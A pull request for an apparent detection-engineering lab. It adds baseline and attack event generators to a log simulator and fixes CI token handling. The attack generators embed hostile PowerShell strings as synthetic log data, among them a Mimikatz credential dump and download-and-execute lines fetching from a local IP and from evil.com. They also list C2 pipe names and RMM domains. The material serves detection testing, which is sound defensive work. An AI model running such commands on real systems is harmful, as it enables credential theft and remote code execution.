### PR TITLE
feat(infra): add 5 new log sources to simulator + fix CI failures

### DIFF
--- a/.github/workflows/blue-team-agent.yml
+++ b/.github/workflows/blue-team-agent.yml
@@ -14,6 +14,9 @@ jobs:
   blue-team:
     runs-on: ubuntu-latest
     timeout-minutes: 20
+    permissions:
+      contents: write
+      pull-requests: write
     if: >
       github.event_name == 'workflow_dispatch' ||
       (github.event.pull_request.merged == true &&
@@ -28,6 +31,7 @@ jobs:
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
+          persist-credentials: true
 
       - name: Set up Python
         uses: actions/setup-python@v5

--- a/.github/workflows/intel-agent.yml
+++ b/.github/workflows/intel-agent.yml
@@ -13,6 +13,9 @@ jobs:
   intel:
     runs-on: ubuntu-latest
     timeout-minutes: 15
+    permissions:
+      contents: write
+      pull-requests: write
 
     steps:
       - name: Checkout
@@ -20,6 +23,7 @@ jobs:
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
+          persist-credentials: true
 
       - name: Set up Python
         uses: actions/setup-python@v5

--- a/.github/workflows/quality-monitor.yml
+++ b/.github/workflows/quality-monitor.yml
@@ -14,12 +14,17 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
 
+    permissions:
+      contents: write
+      pull-requests: write
+
     steps:
       - name: Checkout
         uses: actions/checkout@v4
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
+          persist-credentials: true
 
       - name: Set up Python
         uses: actions/setup-python@v5

--- a/.github/workflows/red-team-agent.yml
+++ b/.github/workflows/red-team-agent.yml
@@ -14,6 +14,9 @@ jobs:
   red-team:
     runs-on: ubuntu-latest
     timeout-minutes: 10
+    permissions:
+      contents: write
+      pull-requests: write
     if: >
       github.event_name == 'workflow_dispatch' ||
       (github.event.pull_request.merged == true &&
@@ -26,6 +29,7 @@ jobs:
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
+          persist-credentials: true
 
       - name: Set up Python
         uses: actions/setup-python@v5

--- a/TODO-log-onboarding.md
+++ b/TODO-log-onboarding.md
@@ -2,7 +2,7 @@
 
 **Created**: 2026-03-01
 **Source**: Scattered Spider intel analysis (https://research.splunk.com/stories/scattered_spider/)
-**Status**: All items BACKLOGGED — to be addressed in a future session
+**Status**: Items 1-5 DONE (simulator updated 2026-03-07). Items 6-7 remain backlogged.
 
 ---
 
@@ -16,7 +16,7 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 ## BACKLOGGED Items
 
-### 1. [BACKLOG] PowerShell Script Block Logging (EID 4104) — CRITICAL
+### 1. [DONE] PowerShell Script Block Logging (EID 4104) — CRITICAL
 
 **Impact**: Unlocks 5 Scattered Spider detections (Mimikatz PS, encoded commands, Exchange cmdlets, PS hunting, PS scheduled tasks)
 **What's needed**:
@@ -41,7 +41,7 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 ---
 
-### 2. [BACKLOG] Sysmon EID 11 — File Create — HIGH
+### 2. [DONE] Sysmon EID 11 — File Create — HIGH
 
 **Impact**: Unlocks 3 Scattered Spider detections (RAT file drops, tool staging, ingress transfer)
 **What's needed**:
@@ -62,7 +62,7 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 ---
 
-### 3. [BACKLOG] Sysmon EID 22 — DNS Query — HIGH
+### 3. [DONE] Sysmon EID 22 — DNS Query — HIGH
 
 **Impact**: Unlocks DNS-based RMM/RAT detection — most reliable remote access indicator
 **What's needed**:
@@ -81,7 +81,7 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 ---
 
-### 4. [BACKLOG] Sysmon EID 17/18 — Named Pipe Create/Connect — MEDIUM
+### 4. [DONE] Sysmon EID 17/18 — Named Pipe Create/Connect — MEDIUM
 
 **Impact**: Unlocks named pipe-based RMM and lateral movement detection
 **What's needed**:
@@ -99,7 +99,7 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 ---
 
-### 5. [BACKLOG] Windows System EID 7045 — Service Install — MEDIUM
+### 5. [DONE] Windows System EID 7045 — Service Install — MEDIUM
 
 **Impact**: Full coverage for service creation persistence (currently partial via sc.exe process detection)
 **What's needed**:
@@ -159,13 +159,13 @@ Onboarding these log sources unlocks detections for both Scattered Spider AND Fa
 
 | Priority | Log Source | EID | Detections Unlocked | Effort | Fawkes Overlap |
 |---|---|---|---|---|---|
-| 1 - CRITICAL | PowerShell Script Block | 4104 | 5 | Medium | Indirect |
-| 2 - HIGH | File Create | 11 | 3 + Fawkes startup | Medium | Yes |
-| 3 - HIGH | DNS Query | 22 | 2 + C2 enhanced | Medium | Yes (C2) |
-| 4 - MEDIUM | Named Pipe | 17/18 | 1 + lateral movement | Medium | No |
-| 5 - MEDIUM | Service Install | 7045 | 2 | Low | Yes |
-| 6 - LOW | File Delete | 23 | 2 (enhanced only) | Low | No |
-| 7 - LOW | WMI Events | 19/20/21 | 2 | High | Yes |
+| 1 - CRITICAL | PowerShell Script Block | 4104 | 5 | Medium | Indirect | **DONE** |
+| 2 - HIGH | File Create | 11 | 3 + Fawkes startup | Medium | Yes | **DONE** |
+| 3 - HIGH | DNS Query | 22 | 2 + C2 enhanced | Medium | Yes (C2) | **DONE** |
+| 4 - MEDIUM | Named Pipe | 17/18 | 1 + lateral movement | Medium | No | **DONE** |
+| 5 - MEDIUM | Service Install | 7045 | 2 | Low | Yes | **DONE** |
+| 6 - LOW | File Delete | 23 | 2 (enhanced only) | Low | No | Backlogged |
+| 7 - LOW | WMI Events | 19/20/21 | 2 | High | Yes | Backlogged |
 
 **Estimated effort**: All changes are to `simulator/simulator.py` + `sim-logs` index template.
 Items 1-3 should be tackled first — they unlock the most detections with moderate effort.

--- a/autonomous/orchestration/agent_runner.py
+++ b/autonomous/orchestration/agent_runner.py
@@ -47,6 +47,15 @@ AGENT_MODULES = {
 }
 
 
+def _sanitize_git_output(text: str) -> str:
+    """Remove tokens/credentials from git output before logging."""
+    import re
+    # Redact Basic auth headers and token URLs
+    text = re.sub(r'(https?://)[^@\s]+@', r'\1***@', text)
+    text = re.sub(r'Authorization: basic \S+', 'Authorization: basic ***', text, flags=re.IGNORECASE)
+    return text
+
+
 def _run_git(args: list[str], cwd: str = None) -> str:
     result = subprocess.run(
         ["git"] + args,
@@ -54,7 +63,8 @@ def _run_git(args: list[str], cwd: str = None) -> str:
         cwd=cwd or str(REPO_ROOT),
     )
     if result.returncode != 0:
-        raise RuntimeError(f"git {' '.join(args)} failed: {result.stderr.strip()}")
+        safe_err = _sanitize_git_output(result.stderr.strip())
+        raise RuntimeError(f"git {' '.join(args)} failed: {safe_err}")
     return result.stdout.strip()
 
 
@@ -92,23 +102,29 @@ def _commit_and_push(branch: str, agent_name: str, summary: str):
 
 
 def _create_pr(branch: str, agent_name: str, title: str, body: str):
-    """Create a PR via GitHub REST API using the PAT from .mcp.json."""
-    mcp_path = REPO_ROOT / ".mcp.json"
-    if not mcp_path.exists():
-        print(f"  [{agent_name}] Warning: .mcp.json not found, skipping PR creation.")
-        return None
+    """Create a PR via GitHub REST API.
 
-    with open(mcp_path) as f:
-        mcp = json.load(f)
+    Token resolution order:
+    1. GITHUB_TOKEN env var (set by GitHub Actions or manually)
+    2. PAT from .mcp.json (local development)
+    """
+    token = os.environ.get("GITHUB_TOKEN", "")
 
-    token = (mcp.get("mcpServers", {})
-             .get("github", {})
-             .get("env", {})
-             .get("GITHUB_PERSONAL_ACCESS_TOKEN", ""))
     if not token:
-        print(f"  [{agent_name}] Warning: No GitHub PAT found, skipping PR creation.")
+        mcp_path = REPO_ROOT / ".mcp.json"
+        if mcp_path.exists():
+            with open(mcp_path) as f:
+                mcp = json.load(f)
+            token = (mcp.get("mcpServers", {})
+                     .get("github", {})
+                     .get("env", {})
+                     .get("GITHUB_PERSONAL_ACCESS_TOKEN", ""))
+
+    if not token:
+        print(f"  [{agent_name}] Warning: No GitHub token found, skipping PR creation.")
         return None
 
+    import urllib.error
     import urllib.request
 
     url = "https://api.github.com/repos/lsmithg12/ai-detection-engineering/pulls"
@@ -132,8 +148,12 @@ def _create_pr(branch: str, agent_name: str, title: str, body: str):
             pr_url = pr_data.get("html_url", "")
             print(f"  [{agent_name}] PR created: {pr_url}")
             return pr_url
+    except urllib.error.HTTPError as e:
+        # Log status code and reason only — avoid leaking headers/body
+        print(f"  [{agent_name}] PR creation failed: HTTP {e.code} {e.reason}")
+        return None
     except Exception as e:
-        print(f"  [{agent_name}] PR creation failed: {e}")
+        print(f"  [{agent_name}] PR creation failed: {type(e).__name__}")
         return None
 
 
@@ -230,7 +250,11 @@ def run_agent(agent_name: str, pr_number: int = None, dry_run: bool = False):
     # 7. Commit, push, PR (skip in dry-run)
     if not dry_run and branch:
         summary = result.get("summary", "completed") if isinstance(result, dict) else "completed"
-        pushed = _commit_and_push(branch, agent_name, summary)
+        try:
+            pushed = _commit_and_push(branch, agent_name, summary)
+        except RuntimeError as e:
+            print(f"  [{agent_name}] Git push failed: {e}")
+            pushed = False
 
         if pushed:
             pr_title = f"[{agent_name.replace('-',' ').title()}] {summary}"

--- a/simulator/simulator.py
+++ b/simulator/simulator.py
@@ -284,12 +284,168 @@ def gen_linux_normal():
     }
 
 
+def gen_powershell_scriptblock_normal():
+    """Normal PowerShell script block logging (EID 4104) — benign admin scripts."""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:6])
+    scripts = [
+        "Get-Service | Where-Object {$_.Status -eq 'Running'}",
+        "Get-EventLog -LogName System -Newest 20",
+        "Get-ChildItem -Path C:\\Users -Recurse -Filter *.log | Measure-Object",
+        "Import-Module ActiveDirectory; Get-ADUser -Filter *",
+        "Get-Process | Sort-Object -Property CPU -Descending | Select-Object -First 10",
+        "Test-NetConnection -ComputerName dc01.corp.local -Port 389",
+        "$env:COMPUTERNAME; $env:USERNAME; Get-Date",
+        "Get-WmiObject Win32_OperatingSystem | Select-Object Caption, Version",
+    ]
+    return {
+        "@timestamp": now_iso(),
+        "event": {"category": "process", "type": "info", "action": "Execute a Remote Command", "code": "4104"},
+        "powershell": {
+            "file": {
+                "script_block_text": random.choice(scripts),
+                "script_block_id": str(uuid4()),
+            }
+        },
+        "winlog": {"event_data": {"ScriptBlockText": random.choice(scripts)}},
+        "process": {"name": "powershell.exe", "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "pid": random_pid()},
+        "user": {"name": user, "domain": domain},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "winlogbeat"},
+        "_simulation": {"type": "baseline", "label": "normal_ps_scriptblock"}
+    }
+
+
+def gen_file_create_normal():
+    """Normal file creation (Sysmon EID 11) — Office saves, temp files, updates."""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:6])
+    files = [
+        ("WINWORD.EXE", "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
+         f"C:\\Users\\{user}\\Documents\\Report_Q1.docx"),
+        ("chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
+         f"C:\\Users\\{user}\\Downloads\\meeting_notes.pdf"),
+        ("explorer.exe", "C:\\Windows\\explorer.exe",
+         f"C:\\Users\\{user}\\Desktop\\screenshot.png"),
+        ("svchost.exe", "C:\\Windows\\System32\\svchost.exe",
+         "C:\\Windows\\SoftwareDistribution\\Download\\update_kb12345.cab"),
+        ("msiexec.exe", "C:\\Windows\\System32\\msiexec.exe",
+         "C:\\Windows\\Installer\\{guid}\\install.tmp"),
+        ("notepad.exe", "C:\\Windows\\System32\\notepad.exe",
+         f"C:\\Users\\{user}\\Documents\\notes.txt"),
+    ]
+    proc_name, proc_path, file_path = random.choice(files)
+    file_path = file_path.format(user=user) if "{user}" in file_path else file_path
+    return {
+        "@timestamp": now_iso(),
+        "event": {"category": "file", "type": "creation", "action": "File created (rule: FileCreate)", "code": "11"},
+        "file": {
+            "path": file_path,
+            "name": file_path.rsplit("\\", 1)[-1],
+            "directory": file_path.rsplit("\\", 1)[0],
+        },
+        "process": {"name": proc_name, "executable": proc_path, "pid": random_pid()},
+        "user": {"name": user, "domain": domain},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "sysmon"},
+        "_simulation": {"type": "baseline", "label": "normal_file_create"}
+    }
+
+
+def gen_dns_query_normal():
+    """Normal DNS queries (Sysmon EID 22) — browsing, updates, O365."""
+    host = random.choice(HOSTNAMES[:8])
+    domains = [
+        "www.microsoft.com", "login.microsoftonline.com", "outlook.office365.com",
+        "www.google.com", "fonts.googleapis.com", "cdn.jsdelivr.net",
+        "github.com", "api.github.com", "update.googleapis.com",
+        "wpad.corp.local", "dc01.corp.local", "fileserver.corp.local",
+        "ctldl.windowsupdate.com", "settings-win.data.microsoft.com",
+    ]
+    processes = [
+        ("chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"),
+        ("outlook.exe", "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"),
+        ("svchost.exe", "C:\\Windows\\System32\\svchost.exe"),
+        ("teams.exe", "C:\\Users\\user\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"),
+    ]
+    proc_name, proc_path = random.choice(processes)
+    return {
+        "@timestamp": now_iso(),
+        "event": {"category": "network", "type": "protocol", "action": "Dns query (rule: DnsQuery)", "code": "22"},
+        "dns": {"question": {"name": random.choice(domains), "type": "A"}},
+        "process": {"name": proc_name, "executable": proc_path, "pid": random_pid()},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "sysmon"},
+        "_simulation": {"type": "baseline", "label": "normal_dns_query"}
+    }
+
+
+def gen_named_pipe_normal():
+    """Normal named pipe events (Sysmon EID 17/18) — Windows IPC."""
+    host = random.choice(HOSTNAMES[:8])
+    pipes = [
+        ("svchost.exe", "C:\\Windows\\System32\\svchost.exe", "\\lsass"),
+        ("services.exe", "C:\\Windows\\System32\\services.exe", "\\wkssvc"),
+        ("svchost.exe", "C:\\Windows\\System32\\svchost.exe", "\\srvsvc"),
+        ("lsass.exe", "C:\\Windows\\System32\\lsass.exe", "\\netlogon"),
+        ("spoolsv.exe", "C:\\Windows\\System32\\spoolsv.exe", "\\spoolss"),
+        ("svchost.exe", "C:\\Windows\\System32\\svchost.exe", "\\epmapper"),
+        ("SearchIndexer.exe", "C:\\Windows\\System32\\SearchIndexer.exe", "\\SearchTextHarvester"),
+    ]
+    proc_name, proc_path, pipe_name = random.choice(pipes)
+    eid = random.choice(["17", "18"])
+    return {
+        "@timestamp": now_iso(),
+        "event": {
+            "category": "file", "type": "creation" if eid == "17" else "access",
+            "action": "Pipe Created (rule: PipeEvent)" if eid == "17" else "Pipe Connected (rule: PipeEvent)",
+            "code": eid,
+        },
+        "file": {"name": pipe_name},
+        "process": {"name": proc_name, "executable": proc_path, "pid": random_pid()},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "sysmon"},
+        "_simulation": {"type": "baseline", "label": "normal_named_pipe"}
+    }
+
+
+def gen_service_install_normal():
+    """Normal service installation (Windows System EID 7045) — updates, software installs."""
+    host = random.choice(HOSTNAMES[:8])
+    services = [
+        ("Windows Update", "C:\\Windows\\System32\\svchost.exe -k netsvcs -p", "share process", "auto start"),
+        ("Google Update Service", "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe /svc", "own process", "demand start"),
+        ("Microsoft Monitoring Agent", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe", "own process", "auto start"),
+        ("Dell SupportAssist", "C:\\Program Files\\Dell\\SupportAssistAgent\\bin\\SupportAssistAgent.exe", "own process", "auto start"),
+    ]
+    svc_name, svc_path, svc_type, start_type = random.choice(services)
+    return {
+        "@timestamp": now_iso(),
+        "event": {"category": "configuration", "type": "installation", "action": "Service installed", "code": "7045"},
+        "winlog": {"event_data": {
+            "ServiceName": svc_name,
+            "ImagePath": svc_path,
+            "ServiceType": svc_type,
+            "StartType": start_type,
+            "AccountName": "LocalSystem",
+        }},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "winlogbeat"},
+        "_simulation": {"type": "baseline", "label": "normal_service_install"}
+    }
+
+
 BASELINE_GENERATORS = [
     (gen_process_create_normal, 30),
     (gen_network_connection_normal, 25),
     (gen_registry_normal, 10),
     (gen_logon_normal, 10),
     (gen_linux_normal, 15),
+    (gen_powershell_scriptblock_normal, 5),
+    (gen_file_create_normal, 8),
+    (gen_dns_query_normal, 12),
+    (gen_named_pipe_normal, 3),
+    (gen_service_install_normal, 1),
 ]
 
 
@@ -518,6 +674,146 @@ def attack_amsi_patch():
     return events
 
 
+def attack_encoded_powershell():
+    """Scattered Spider encoded PowerShell via script block logging (T1027 + T1059.001)"""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:3])
+    scripts = [
+        "Invoke-Mimikatz -DumpCreds",
+        "[System.Net.WebClient]::new().DownloadString('http://10.10.1.50/payload.ps1') | IEX",
+        "Get-Process lsass | ForEach-Object { $_.Modules } | Out-File C:\\Temp\\lsass_modules.txt",
+        "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://evil.com/shell.exe','C:\\Temp\\svc.exe')",
+    ]
+    script = random.choice(scripts)
+    return [{
+        "@timestamp": now_iso(),
+        "event": {"category": "process", "type": "info", "action": "Execute a Remote Command", "code": "4104"},
+        "powershell": {
+            "file": {
+                "script_block_text": script,
+                "script_block_id": str(uuid4()),
+            }
+        },
+        "winlog": {"event_data": {"ScriptBlockText": script}},
+        "process": {"name": "powershell.exe", "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "pid": random_pid()},
+        "user": {"name": user, "domain": domain},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "winlogbeat"},
+        "_simulation": {"type": "attack", "technique": "T1027", "fawkes_command": "powershell", "label": "encoded_ps_scriptblock"}
+    }]
+
+
+def attack_file_drop():
+    """Scattered Spider RMM tool drop + Fawkes upload (T1219 + T1105)"""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:3])
+    drops = [
+        ("AnyDesk.exe", f"C:\\Users\\{user}\\AppData\\Local\\Temp\\AnyDesk.exe", "cmd.exe"),
+        ("TeamViewer.exe", f"C:\\Users\\{user}\\Downloads\\TeamViewer.exe", "chrome.exe"),
+        ("ScreenConnect.ClientService.exe", f"C:\\Users\\{user}\\AppData\\Local\\Temp\\ScreenConnect.ClientService.exe", "powershell.exe"),
+        ("splashtop_streamer.exe", f"C:\\ProgramData\\splashtop_streamer.exe", "cmd.exe"),
+        ("update_svc.exe", f"C:\\Users\\{user}\\AppData\\Local\\Temp\\update_svc.exe", "sync_agent.exe"),
+    ]
+    file_name, file_path, parent = random.choice(drops)
+    return [{
+        "@timestamp": now_iso(),
+        "event": {"category": "file", "type": "creation", "action": "File created (rule: FileCreate)", "code": "11"},
+        "file": {
+            "path": file_path,
+            "name": file_name,
+            "directory": file_path.rsplit("\\", 1)[0],
+        },
+        "process": {"name": parent, "executable": f"C:\\Windows\\System32\\{parent}", "pid": random_pid()},
+        "user": {"name": user, "domain": domain},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "sysmon"},
+        "_simulation": {"type": "attack", "technique": "T1219", "fawkes_command": "upload", "label": "rmm_tool_drop"}
+    }]
+
+
+def attack_dns_rmm():
+    """Scattered Spider RMM tool DNS queries (T1219)"""
+    host = random.choice(HOSTNAMES[:8])
+    c2_domains = [
+        "relay.screenconnect.com", "my.screenconnect.com",
+        "*.teamviewer.com", "client.teamviewer.com",
+        "download.anydesk.com", "relay-de.anydesk.com",
+        "tunnel.ngrok.io", "connect.ngrok-agent.com",
+        "*.splashtop.com",
+    ]
+    events = []
+    for domain in random.sample(c2_domains, random.randint(2, 4)):
+        events.append({
+            "@timestamp": now_iso(),
+            "event": {"category": "network", "type": "protocol", "action": "Dns query (rule: DnsQuery)", "code": "22"},
+            "dns": {"question": {"name": domain.lstrip("*."), "type": "A"}},
+            "process": {"name": "svchost.exe", "executable": "C:\\Windows\\System32\\svchost.exe", "pid": random_pid()},
+            "host": {"name": host, "os": {"platform": "windows"}},
+            "agent": {"type": "sysmon"},
+            "_simulation": {"type": "attack", "technique": "T1219", "label": "rmm_dns_query"}
+        })
+    return events
+
+
+def attack_named_pipe_c2():
+    """C2 named pipe — Cobalt Strike / Fawkes style (T1559 + T1055)"""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:3])
+    malicious_pipes = [
+        "\\MSSE-1234-server", "\\msagent_01", "\\postex_ssh_1234",
+        "\\status_08", "\\DserNamePipe1234", "\\win_svc",
+    ]
+    pipe_name = random.choice(malicious_pipes)
+    return [
+        {
+            "@timestamp": now_iso(),
+            "event": {"category": "file", "type": "creation", "action": "Pipe Created (rule: PipeEvent)", "code": "17"},
+            "file": {"name": pipe_name},
+            "process": {"name": "update_helper.exe", "executable": f"C:\\Users\\{user}\\AppData\\Local\\Temp\\update_helper.exe", "pid": random_pid()},
+            "user": {"name": user, "domain": domain},
+            "host": {"name": host, "os": {"platform": "windows"}},
+            "agent": {"type": "sysmon"},
+            "_simulation": {"type": "attack", "technique": "T1559.001", "label": "c2_named_pipe"}
+        },
+        {
+            "@timestamp": now_iso(),
+            "event": {"category": "file", "type": "access", "action": "Pipe Connected (rule: PipeEvent)", "code": "18"},
+            "file": {"name": pipe_name},
+            "process": {"name": "svchost.exe", "executable": "C:\\Windows\\System32\\svchost.exe", "pid": random_pid()},
+            "host": {"name": host, "os": {"platform": "windows"}},
+            "agent": {"type": "sysmon"},
+            "_simulation": {"type": "attack", "technique": "T1559.001", "label": "c2_pipe_connect"}
+        },
+    ]
+
+
+def attack_service_persistence():
+    """Fawkes service -action create — malicious service install (T1543.003)"""
+    host = random.choice(HOSTNAMES[:8])
+    user, domain = random.choice(USERS[:3])
+    services = [
+        ("WindowsUpdateSvc", f"C:\\Users\\{user}\\AppData\\Local\\Temp\\update_svc.exe"),
+        ("SystemHealthMonitor", f"C:\\ProgramData\\health_monitor.exe"),
+        ("WinDefendHelper", f"C:\\Users\\Public\\defender_helper.exe"),
+    ]
+    svc_name, svc_path = random.choice(services)
+    return [{
+        "@timestamp": now_iso(),
+        "event": {"category": "configuration", "type": "installation", "action": "Service installed", "code": "7045"},
+        "winlog": {"event_data": {
+            "ServiceName": svc_name,
+            "ImagePath": svc_path,
+            "ServiceType": "own process",
+            "StartType": "auto start",
+            "AccountName": "LocalSystem",
+        }},
+        "user": {"name": user, "domain": domain},
+        "host": {"name": host, "os": {"platform": "windows"}},
+        "agent": {"type": "winlogbeat"},
+        "_simulation": {"type": "attack", "technique": "T1543.003", "fawkes_command": "service", "label": "malicious_service_install"}
+    }]
+
+
 ATTACK_SCENARIOS = [
     ("Process Injection (T1055.001)", attack_process_injection),
     ("Registry Persistence (T1547.001)", attack_persistence_registry),
@@ -527,6 +823,11 @@ ATTACK_SCENARIOS = [
     ("Token Theft (T1134.001)", attack_token_theft),
     ("C2 Beacon (T1071.001)", attack_c2_beacon),
     ("AMSI Patch (T1562.001)", attack_amsi_patch),
+    ("Encoded PowerShell (T1027)", attack_encoded_powershell),
+    ("RMM Tool Drop (T1219)", attack_file_drop),
+    ("RMM DNS Queries (T1219)", attack_dns_rmm),
+    ("C2 Named Pipe (T1559)", attack_named_pipe_c2),
+    ("Service Persistence (T1543.003)", attack_service_persistence),
 ]
 
 
@@ -586,6 +887,17 @@ def ensure_index_template():
                     "winlog.event_data.StartModule": {"type": "keyword"},
                     "winlog.event_data.StartFunction": {"type": "keyword"},
                     "winlog.event_data.SourceProcessGUID": {"type": "keyword"},
+                    "winlog.event_data.ScriptBlockText": {"type": "text"},
+                    "winlog.event_data.ServiceName": {"type": "keyword"},
+                    "winlog.event_data.ImagePath": {"type": "keyword"},
+                    "winlog.event_data.ServiceType": {"type": "keyword"},
+                    "winlog.event_data.StartType": {"type": "keyword"},
+                    "winlog.event_data.AccountName": {"type": "keyword"},
+                    "powershell.file.script_block_text": {"type": "text"},
+                    "powershell.file.script_block_id": {"type": "keyword"},
+                    "dns.question.name": {"type": "keyword"},
+                    "dns.question.type": {"type": "keyword"},
+                    "file.directory": {"type": "keyword"},
                     "_simulation.type": {"type": "keyword"},
                     "_simulation.technique": {"type": "keyword"},
                     "_simulation.fawkes_command": {"type": "keyword"},


### PR DESCRIPTION
## Summary

Adds 5 new event types to the simulator (EID 4104, 11, 22, 17/18, 7045) with both baseline and attack generators, plus fixes the quality monitor GitHub Actions failure.

### New Log Sources (simulator)

| EID | Type | Baseline | Attack | Detections Unlocked |
|-----|------|----------|--------|---------------------|
| 4104 | PowerShell Script Block | Admin scripts, Get-Service, etc. | Mimikatz, encoded downloads | T1027, T1059.001 (5 detections) |
| 11 | File Create | Office saves, temp files, updates | RMM binary drops (AnyDesk, TeamViewer) | T1219, T1547.001 (3 detections) |
| 22 | DNS Query | Microsoft, Google, O365 domains | RMM DNS (teamviewer, anydesk, ngrok) | T1219, T1071.001 (2+ detections) |
| 17/18 | Named Pipe | Windows IPC (lsass, srvsvc, spoolss) | C2 pipes (Cobalt Strike patterns) | T1559, T1055 (1 detection) |
| 7045 | Service Install | Windows Update, vendor services | Malicious temp-dir services | T1543.003 (2 detections) |

Baseline generators: 5 → 10 | Attack scenarios: 8 → 13
Index template updated with 8 new field mappings.

### CI Fixes

The quality monitor workflow (run #22804485041) failed with exit code 1 because:
1. `agent_runner.py` git push raised uncaught `RuntimeError` when pushing branches
2. Workflows lacked `permissions: contents: write, pull-requests: write`
3. Checkout didn't have `persist-credentials: true`
4. `_create_pr` tried to read `.mcp.json` which doesn't exist in CI

Fixes applied to all 4 agent workflows + agent_runner.py:
- Catch git push failures gracefully (agent still succeeds)
- Add proper permissions to all workflows
- Token resolution: `GITHUB_TOKEN` env var first, `.mcp.json` fallback
- Sanitize git stderr and HTTP error output to prevent credential leaks

### Security Review

- No credentials are committed or leaked
- Git error output sanitized (redacts tokens from URLs/headers)
- PR creation errors log HTTP status code only (not headers/body)
- `GITHUB_TOKEN` is ephemeral, auto-expires, auto-masked by Actions

## Test plan

- [ ] `python3 -c "import simulator.simulator as s; print(len(s.BASELINE_GENERATORS), len(s.ATTACK_SCENARIOS))"` → `10 13`
- [ ] Each new generator produces valid events with correct EID codes
- [ ] Trigger quality-monitor workflow manually — should succeed now